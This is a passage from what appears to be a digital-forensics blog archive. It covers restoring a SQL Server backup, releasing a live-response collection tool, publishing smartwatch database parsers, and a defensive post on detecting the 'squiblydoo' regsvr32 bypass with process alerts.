<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEievbWYhyphenhyphendiKUaigYUGE4C5Is5vcO69I0yTQ5qJ2J5EBQs82PKl2OZyUVXpQgPLoX0m3geYV9xuZWc580_BZ1tQslikIQW48Jhdv9belebXh-nylpXKawtlmNKRL2NRbltWyGOn5_Ns3qH0/s1600/addingbakfile.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="432" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEievbWYhyphenhyphendiKUaigYUGE4C5Is5vcO69I0yTQ5qJ2J5EBQs82PKl2OZyUVXpQgPLoX0m3geYV9xuZWc580_BZ1tQslikIQW48Jhdv9belebXh-nylpXKawtlmNKRL2NRbltWyGOn5_Ns3qH0/s640/addingbakfile.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">Browse to the folder containing the .bak file</span></i></td></tr>
</tbody></table>
<br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Now the Select backup devices should be populated with our backup file. As long as it is properly in box, click "OK".</span><br />
<span style="font-size: large;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSQfZFkDFuGFO1sUsPg33EwftivtV5irLiz-3esjhho7fKoVvZ0l6WBteoYyd0OUmlqgJLRVKCaeyZ2cklfUNN31hWJPRfgsmdjND_3w-_7yJyzoaEkNWZXkBRUof6L2mUkUbQXhNoIkj8/s1600/inthebox-clickok.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="436" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSQfZFkDFuGFO1sUsPg33EwftivtV5irLiz-3esjhho7fKoVvZ0l6WBteoYyd0OUmlqgJLRVKCaeyZ2cklfUNN31hWJPRfgsmdjND_3w-_7yJyzoaEkNWZXkBRUof6L2mUkUbQXhNoIkj8/s640/inthebox-clickok.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">Select backup devices is now populated!</span></i></td></tr>
</tbody></table>
<br />
<span style="font-size: large;">There will be a pause as the system processes the information, and you should see the box under "Backup sets to restore" populate with information. As long as it populates properly, you can click "OK".</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEganVUvn1O15l3Fg_zQ5Z0j4LY18M24sh22j3fRJeQHX4_gulE_JDIBOihdXzsftneYto_2oDhH4XCbV8QhNGVi3-kNCWs_swLWKThAxDD0xWuyNP2YVVmYdvzQ8GP-CcjQ6BchM8zEuMWM/s1600/backupsetspopulatedok.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="564" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEganVUvn1O15l3Fg_zQ5Z0j4LY18M24sh22j3fRJeQHX4_gulE_JDIBOihdXzsftneYto_2oDhH4XCbV8QhNGVi3-kNCWs_swLWKThAxDD0xWuyNP2YVVmYdvzQ8GP-CcjQ6BchM8zEuMWM/s640/backupsetspopulatedok.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">The fields are populated, so we can click OK and let the backup restore process start!</span></i></td></tr>
</tbody></table>
<br />
<span style="font-size: large;">The backup process will take some time to fully restore depending on the size of the database, but once it is done restoring, it will be fully loaded and we can start to make our queries!</span><br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDaugtLZ14dYsNkP2zMgRzKdSMuUIQt-iqGnI9DbMNZt5d7DtE4H43RU5evBterlYvY6ckxrdAodDi1E-WpBsbKDGZqHISaR0LMTuktLxHnn-U6BI3TclBxrd1DPGBM-VtLcfmh5t4vCSF/s1600/restore-complete.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="560" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDaugtLZ14dYsNkP2zMgRzKdSMuUIQt-iqGnI9DbMNZt5d7DtE4H43RU5evBterlYvY6ckxrdAodDi1E-WpBsbKDGZqHISaR0LMTuktLxHnn-U6BI3TclBxrd1DPGBM-VtLcfmh5t4vCSF/s640/restore-complete.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">The restore has been completed!</span></i></td></tr>
</tbody></table>
<br />
<b style="font-size: x-large;">Step 8: Make your SQL queries using SSMS</b><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Once the database is loaded, you will see it under the "Databases" folder.</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2QpMGG5XxBAOtOANGyshCB_zU65ZqH4Ee9M_2kWs0arpvJSiriG4CrETiMuOCqjm5Sc_TsPbRiIX3qYZET6lGSfQMmMpQK05aKv0LqoDuAl5xQAGPywwqhB9PetO9DFo5uN_1fpbGPhTk/s1600/databasesfolder.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2QpMGG5XxBAOtOANGyshCB_zU65ZqH4Ee9M_2kWs0arpvJSiriG4CrETiMuOCqjm5Sc_TsPbRiIX3qYZET6lGSfQMmMpQK05aKv0LqoDuAl5xQAGPywwqhB9PetO9DFo5uN_1fpbGPhTk/s640/databasesfolder.jpg" width="514" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">The database, seen under the databases folder</span></i></td></tr>
</tbody></table>
<br />
<span style="font-size: large;">You can expand on the database and see all of the associated information, but more than likely "Tables" is going to be the main area that you are going to focus on.</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2MmziNVHcQBxKmpVpDK2MQjrNHV23DD0bpCCo4lUw82O3hmCA7-HKEMAnxF6BDo3owmLqERtMFm78Yh3Syz2RZeLaWpsohFDM8SCL9lZnZAxQtp-ZaV02ej8oN8WbMAgwY5vDPmZd56W_/s1600/dbtables.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2MmziNVHcQBxKmpVpDK2MQjrNHV23DD0bpCCo4lUw82O3hmCA7-HKEMAnxF6BDo3owmLqERtMFm78Yh3Syz2RZeLaWpsohFDM8SCL9lZnZAxQtp-ZaV02ej8oN8WbMAgwY5vDPmZd56W_/s640/dbtables.jpg" width="362" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">Some of the tables in this database. There are SOOO many tables!</span></i></td></tr>
</tbody></table>
<br />
<span style="font-size: large;">Thanks to the power of SSMS, you can actually use some of the preconfigured queries to get you started!</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgObllus_E1dHTtU9fCFHpEPqV0l6OB8mwJ7fbPGY_bMH12Ha4CKGucp-tcIUwmX53eMTwAwEDJNxrdNA0Bf_dh_SN2pZcL_0eCVvl3qEMuBgTHYq7uH4JkW3hX3Z3au1Cu2jyfNxo6jSWg/s1600/builtinquery.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgObllus_E1dHTtU9fCFHpEPqV0l6OB8mwJ7fbPGY_bMH12Ha4CKGucp-tcIUwmX53eMTwAwEDJNxrdNA0Bf_dh_SN2pZcL_0eCVvl3qEMuBgTHYq7uH4JkW3hX3Z3au1Cu2jyfNxo6jSWg/s640/builtinquery.jpg" width="336" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">Some of the options. "Select Top 1000 Rows" is your friend!</span></i></td></tr>
</tbody></table>
<br />
<span style="font-size: large;">You can select the top 1000 rows, and then build out your specific queries accordingly, however you would like!</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqame_xb8amaa3rIGSXZWdTFUzHQ-btAREfxvw2TO0jMByqGDmQN8XpsHI2CbENHsbqa7-AwyhfRyEHhTJsAgHLZas7EhegbhS03BnDN53Jw9USv54seASuAU_BhuOrcaEpGiOCU1fwdC9/s1600/selecttop1000.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="332" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqame_xb8amaa3rIGSXZWdTFUzHQ-btAREfxvw2TO0jMByqGDmQN8XpsHI2CbENHsbqa7-AwyhfRyEHhTJsAgHLZas7EhegbhS03BnDN53Jw9USv54seASuAU_BhuOrcaEpGiOCU1fwdC9/s640/selecttop1000.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">The results of selecting the top 1000 rows from this particular table</span></i></td></tr>
</tbody></table>
<br />
<span style="font-size: large;"><br /></span>
<b><span style="font-size: large;">Step 9: </span><span style="font-size: large;">Great success! High five!</span></b><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">I definitely hope that this rather lengthy blog post helps in the event that you ever find yourself in a situation like this. It is of course much easier to get data from whatever database front end that is available, but if you can only get a backup of the raw database, it takes some time and research to build up good queries to find the information that you are after!</span><br />
<span style="font-size: large;"><br /></span>Brian Moranhttp://www.blogger.com/profile/10916463151597324052noreply@blogger.com0tag:blogger.com,1999:blog-1547389155659419533.post-86507843305404963102016-12-12T15:02:00.000-05:002019-10-17T11:15:35.052-04:00Live Response Collection - Bambiraptor<br />
<span style="font-size: large;">Good news everyone!! After a fairly busy year, the past few weeks I have finally had enough down time to work on adding some long overdue, and hopefully highly anticipated, features to the Live Response Collection. This version, named Bambiraptor, will fix some of the small issues that were pointed out in the scripts, including making it a little more pronounced that I am using the Belkasoft RAM Capture tool in the collection, such as an additional file created in both the 32 and 64 bit folder, respectively, at the request of the great folks over at Belkasoft, the autoruns output being the csv file twice, rather than one csv and one easy to read text, some additional logic built in to ensure that the "secure" options actually secure the data, and a couple of minor text fixes to the output. The biggest change is on the OSX side though, so without further ado, we shall dive into that!</span><br />
<span style="font-size: large;"><br /><br />The biggest change on the OSX side is the addition of automated disk imaging. It uses the internal "dd" command to do this, so again, be aware, that if you suspect your system may be SEVERELY compromised, this may generate non-consistent output. If that is the case, you should probably be looking at a commercial solution such as <a href="https://www.blackbagtech.com/software-products/macquisition.html#software-options" target="_blank">Blackbag's Macquistion</a> to acquire the data from a system. Remember, the Live Response Collection is simply another tool in your arsenal, and while it does have some pretty robust capabilities, always be sure that you test and verify that it is working properly within your environment. I have tried my best to ensure that it either works properly or fails, but as there are different flavors of Mac hardware and software, it gets harder and harder to account for every possibility (this, along with the fact that I see way more Windows systems than OSX/*nix systems in the wild, is why my development plan is Windows first, followed by OSX, followed by *nix).</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">With the addition of the disk imaging, there are now a total of three scripts that you can choose to run on an OSX system. They are self explanatory, just like on the Windows side. However, unlike the Windows side, you MUST run specify to the script that you are running it with super user privileges, or else the memory dump & disk imaging will not occur. The Windows side is set to run automatically as Administrator as long as you click the proper pop ups, OSX, to my knowledge, does not have this option).</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">I have purposely held off on releasing "secure" options on the OSX side because I want quite a bit more real-world testing to hopefully identify and eliminate any bugs before starting to secure the data automatically. The reason for this, is again, it is more difficult to account for small changes that can have a big impact on the OSX side and I want to ensure the script(s) are working as properly as possible before encrypting and securely erasing collected data, as I don't want to have to run process(es) more than once because one system does not understand a single quotation mark compared to a double quotation mark.</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">I hope you have a chance to use the Live Response Collection, and as always, if you identify any issues with it, if you find any bugs, or if there are any additional features you would like to add, please let me know. The roadmap for next year includes rewriting portions of the OSX script to better adhere to bash scripting security guidelines, adding secure options to the OSX side, and adding memory dump & automated disk imaging to *nix systems, as well as continuing to add updates and features to the scripts as needed and/or requested.<br /><br /><br /><a href="https://www.brimorlabs.com/Tools/LiveResponseCollection-Cedarpelta.zip" target="_blank">LiveResponseCollection-Cedarpelta.zip - download here</a><br /><br />MD5: 7bc32091c1e7d773162fbdc9455f6432<br />SHA256: 2c32984adf2b5b584761f61bd58b61dfc0c62b27b117be40617fa260596d9c63<br />Updated: September 5, 2019</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>Brian Moranhttp://www.blogger.com/profile/10916463151597324052noreply@blogger.com1tag:blogger.com,1999:blog-1547389155659419533.post-32929973681247239162016-10-28T13:48:00.001-04:002016-10-28T13:48:13.186-04:00Public release of "allyouruarecordarebelongtous" Perl script<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Hello again readers and welcome back! This blog post is going to be short, as the primary purpose is to publicly announce a new script, cleverly titled "allyouruarecordrebelongtous.pl", which was in my "Who Watches The Smart Watches" presentation that I gave at OSDFCon on October 26. This Perl script will allow the user to parse out data from SQLite databases associated with Under Armour Record stored on an Android device and present that information in an easy to read format. Please let me know if you have any questions or comments about the script. </span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">If you would like to see the slides from my OSDFCon presentation, <a href="http://www.slideshare.net/BriMorLabs/who-watches-the-smart-watches-67789794" target="_blank">you can view them here</a>.</span><br />
<br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">The script itself can be found on our github page:</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><a href="https://github.com/brimorlabs/allyouruarecordarebelongtous">https://github.com/brimorlabs/allyouruarecordarebelongtous</a></span><br />
<span style="font-size: large;"><br /></span>
<br />
<br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Please note, in order to run the script you may have to install some Perl modules. On a Windows system, to do this open a command prompt and paste the following command:</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><i>ppm install DBI DBD::SQLite DateTime IO::All</i></span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">On OSX/*nix system, open a terminal window and paste the following command:</span><br />
<span style="font-size: large;"><i><br /></i></span>
<span style="font-size: large;"><i>sudo cpan DBI DBD::SQLite DateTime IO::All</i></span><br />
<span style="font-size: large;"><i><br /></i></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Additionally, I would very much like to thank Jessica Hyde (<a href="https://twitter.com/B1N2H3X">https://twitter.com/B1N2H3X</a>) for helping me generate some test data and helping with code reivew and script output formatting. There is no way I would have been able to put this all together in 2 1/2 weeks without her help!</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>Brian Moranhttp://www.blogger.com/profile/10916463151597324052noreply@blogger.com2tag:blogger.com,1999:blog-1547389155659419533.post-27218680883681542002016-06-24T12:52:00.000-04:002016-06-24T15:19:27.796-04:00Public release of "allyourpebblearebelongtous" Perl script<br />
<br />
<span style="font-size: large;">Hello again readers and welcome back! This blog post is going to be fairly short, as the primary purpose is to publicly announce a new script, cleverly titled "allyourpebblearebelongtous.pl". This Perl script will allow the user to parse out data from a SQLite database associated with Pebble data stored on either an iOS or Android device, and present that information in an easy to read format. Please let me know if you have any questions or comments about the script. </span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">If you would like to see the slides from my SANS presentation, you <a href="http://www.slideshare.net/BriMorLabs/who-watches-the-smart-watches" target="_blank">can view them here</a></span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaNlQepimS61BDx1F3tjKv8VXxap3S0JUJWbcFChLqC1qn5sh9vHoOEbdb5H4OP8pR7VPsmyfsfn79CDMo4cyXRXWwgh6JLVsMrUy0tU8qMIPO7DZMEWunrDzM7ySwxHTDMZr6bGHrALCH/s1600/Screenshot+2016-06-21+at+21.36.53.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="480" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiaNlQepimS61BDx1F3tjKv8VXxap3S0JUJWbcFChLqC1qn5sh9vHoOEbdb5H4OP8pR7VPsmyfsfn79CDMo4cyXRXWwgh6JLVsMrUy0tU8qMIPO7DZMEWunrDzM7ySwxHTDMZr6bGHrALCH/s640/Screenshot+2016-06-21+at+21.36.53.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;"><i>Parsed notifications from Android device</i></span></td></tr>
</tbody></table>
<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCNHviTK0PQR9I91J3RWkUeVj5e5pZhtnRxoiFqN_iVUzV4hx_LfEDvGsCI-Rz_eX9NmuVyIJ31l6ji6_g6vvMyHGeoXL5DERko6jmJQ7-x9MQqBw7gnsZb6PS21WsVcstQyfbxbKU3w-d/s1600/Screenshot+2016-06-21+at+21.37.07.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="472" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCNHviTK0PQR9I91J3RWkUeVj5e5pZhtnRxoiFqN_iVUzV4hx_LfEDvGsCI-Rz_eX9NmuVyIJ31l6ji6_g6vvMyHGeoXL5DERko6jmJQ7-x9MQqBw7gnsZb6PS21WsVcstQyfbxbKU3w-d/s640/Screenshot+2016-06-21+at+21.37.07.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;"><i>Parsed notifications from iOS device</i></span></td></tr>
</tbody></table>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">The script can be found on our newly created github account:</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><a href="https://github.com/brimorlabs/allyourpebblearebelongtous">https://github.com/brimorlabs/allyourpebblearebelongtous</a></span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Please note, in order to run the script you may have to install some Perl modules. On a Windows system, to do this open a command prompt and paste the following command:</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><i>ppm install DBI YAML DBD::SQLite Data::Plist DateTime IO::All</i></span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">On a Linux system, open a terminal window and paste the following command:</span><br />
<span style="font-size: large;"><br /></span>
<i><span style="font-size: large;">sudo cpan </span><span style="font-size: large;">DBI YAML DBD::SQLite Data::Plist DateTime IO::All</span></i><br />
<i><span style="font-size: large;"><br /></span></i><i><span style="font-size: large;"><br /></span></i>
<i><span style="font-size: large;"><br /></span></i><span style="font-size: large;">Additionally, I would like to thank Adrian Leong (</span><span style="font-size: large;"><a href="https://twitter.com/Cheeky4n6Monkey">https://twitter.com/Cheeky4n6Monkey</a>), Mari DeGrazia (<a href="https://twitter.com/maridegrazia">https://twitter.com/maridegrazia</a>), and Heather Mahalik (<a href="https://twitter.com/HeatherMahalik">https://twitter.com/HeatherMahalik</a>) for their help in gathering and testing the collected data. </span><br />
<br />Brian Moranhttp://www.blogger.com/profile/10916463151597324052noreply@blogger.com0tag:blogger.com,1999:blog-1547389155659419533.post-32405470164040130792016-04-22T14:12:00.001-04:002016-04-24T08:43:00.194-04:00Very quick blog post on "squiblydoo"<br />
<span style="font-size: large;">Hello again readers, it has been busy over here for the past few months, but over the past few days there has been some really interesting research done by Casey Smith (<a href="https://twitter.com/subTee" target="_blank">@subTee</a>) regarding COM+ objects, specifically using <a href="https://technet.microsoft.com/en-us/library/bb490985.aspx" target="_blank">regsvr</a> to access external sites (cough cough potentially malware), cleverly named "squiblydoo". <a href="http://subt0x10.blogspot.com/2016/04/bypass-application-whitelisting-script.html" target="_blank">The original blog post is here</a></span><span style="font-size: large;">. Apparently it leaves almost no trace on the system, for which I reference a <a href="https://twitter.com/bbaskin/status/723476447881531392" target="_blank">quick look at running it in Noriben</a>:</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrIjCZ59eKad3_490bLefdsdUCmJhLfKHLkCO48h8A64gPTINM-Jp4O1IwNpYDc6T9fHhG3jnjGasg0SG3VjPk8doNIEMBeQMchadMbWS_vAggBpcz6PPuUHq8eTa6FQY6NSyVaKf2tOi7/s1600/basking-complus.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="286" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrIjCZ59eKad3_490bLefdsdUCmJhLfKHLkCO48h8A64gPTINM-Jp4O1IwNpYDc6T9fHhG3jnjGasg0SG3VjPk8doNIEMBeQMchadMbWS_vAggBpcz6PPuUHq8eTa6FQY6NSyVaKf2tOi7/s640/basking-complus.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">Brian Baskin's tweet regarding results of Noriben looking at "squiblydoo"</span></i></td></tr>
</tbody></table>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Now, I am sure some of you are thinking, "so what, <fill in thoughts here>", because after all, several of the things in the past that we were supposed to get all spun up about (most recently, the debacle that was "badlock" have really turned out to be a lot of marketing hype and not much else). Well, this is something that you should take note of. Until/unless regsvr32 is modified to change the way that it works, there is very little left on the system itself to show that something bad happens. There have been several well respected experts weighing in on this issue (browsing for it will likely give you more information than you ever wanted to know) and the general consensus is that this is pretty worrying. </span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPIZkLztyhAZ6axAAeTcf8echbjq6PWIkElkEeVhQvAPscY0g2rC2s391Iq3Jzd_kvFreJTiZaMzA_sEtOt8oWqWw_L-PmCr0paqjynWhTK9wIRCODR1Pow7SlK2oXjX5yDvpq6qAIODrw/s1600/twitter.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="534" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPIZkLztyhAZ6axAAeTcf8echbjq6PWIkElkEeVhQvAPscY0g2rC2s391Iq3Jzd_kvFreJTiZaMzA_sEtOt8oWqWw_L-PmCr0paqjynWhTK9wIRCODR1Pow7SlK2oXjX5yDvpq6qAIODrw/s640/twitter.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;"><i>Twitter weighs in on "</i><i>squiblydoo"</i></span></td></tr>
</tbody></table>
<span style="font-size: large;"><br /></span>
<br />
<span style="font-size: large;">So, what to do? It is very likely that how often regsvr32 actually gets called is dependent on what you do in your environment. It really should never hit the internet, for anything (I will note that statement has not been fully determined yet) but what I have found to be the most successful solution thus far in limited testing is using the open source tool "<a href="http://en.michaeluno.jp/process-notifier/" target="_blank">Process Notifier</a>". It is pretty easy to set up, you run the proper flavor (32 or 64 bit), choose "Processes to Monitor", then type "regsvr32.exe" as your process name to check, choose "Started" and click "Add", then "Apply" and "Save"</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9zyBK9XNB5rHf3Sv0Lbwqjfn8GnUl3b-dOq2jkJpaU084po_KYxtJlVlQIRt99WxN98YuV3WiBsNs-76hVC5ueNUX8HGwGYRC-SUKFNPWSr_UiwKWknEKFF8t4q4BPEokulRNsV4TQE4T/s1600/procnot.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9zyBK9XNB5rHf3Sv0Lbwqjfn8GnUl3b-dOq2jkJpaU084po_KYxtJlVlQIRt99WxN98YuV3WiBsNs-76hVC5ueNUX8HGwGYRC-SUKFNPWSr_UiwKWknEKFF8t4q4BPEokulRNsV4TQE4T/s640/procnot.jpg" width="550" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">Process Notifier options</span></i></td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7YhSjbZVJOcsR6-9onFzX1HMeDzH0mrNHFC5VbTOIm2VqLcmarNqyDtC3Qg7ik4yfhvu4IaiL-aNk0r16ktULq7fGLttB-VJOmx66PGWcbyj43EHBN7fElPT1JrYD-vpcFm9aaNJbhYIn/s1600/proctomon.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="588" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7YhSjbZVJOcsR6-9onFzX1HMeDzH0mrNHFC5VbTOIm2VqLcmarNqyDtC3Qg7ik4yfhvu4IaiL-aNk0r16ktULq7fGLttB-VJOmx66PGWcbyj43EHBN7fElPT1JrYD-vpcFm9aaNJbhYIn/s640/proctomon.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">Adding regsvr32 to the processes to monitor list</span></i></td></tr>
</tbody></table>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Then you can set up the email alerts under "E-mail Settings", by choosing your send to email address, the message subject, and message body, and even take a screenshot if you'd like under "Message". The next part is very important, under "SMTP" I highly recommend creating a one time throw away gmail account for this, because it does save the account password in plain text on the system. Once you do all of these steps, again choose "Apply" and "Save"</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtIpz8WyWttktXP2yTL7Nv37DiqHg_qwGwWHvv9YKLG-WbixUsK4euqn3zbsA5ti0oZKPy5TbmnxYFc4in1UnyRd6hi1HwYdz_7mMuhgeXLMzaGhVp37YtsdpdwZB_Pip3WyNwH-ibhqa0/s1600/message.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="566" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjtIpz8WyWttktXP2yTL7Nv37DiqHg_qwGwWHvv9YKLG-WbixUsK4euqn3zbsA5ti0oZKPy5TbmnxYFc4in1UnyRd6hi1HwYdz_7mMuhgeXLMzaGhVp37YtsdpdwZB_Pip3WyNwH-ibhqa0/s640/message.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;"><i>"Message" options under E-mail Settings</i></span></td></tr>
</tbody></table>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
